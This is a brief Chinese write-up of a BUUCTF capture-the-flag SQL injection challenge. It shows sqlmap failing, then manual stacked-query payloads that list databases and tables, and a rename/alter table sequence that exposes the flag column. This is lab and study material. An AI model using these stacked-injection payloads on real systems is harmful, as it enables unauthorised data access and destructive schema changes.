buuctf 刷题[强网杯 2019]随便注
一看是sql注入的题,就先找注入点
明显注入点可以在URL中get改变数值
sqlmap试一下
只跑出来一个数据库supersqli
爆破表
跑不出表来
sqlmap不行也可以手动注入
用到的注入方式是堆叠注入
用;符号插入sql语句
0’; show databases;
查数据库
0’; show tables;
查表
两个表,一个一个看
在前面这个表里面发现了flag字段
然后用rename改掉后查看
将表1919810931114514名字改为words,flag列名字改为id,那么我们就能得到flag的内容了:
1’;rename table words
to words1
;rename table 1919810931114514
to words
;alter table words
change flag id varchar(100);
借鉴了这位大佬的博客:https://www.cnblogs.com/l0y0h/articles/15246301.html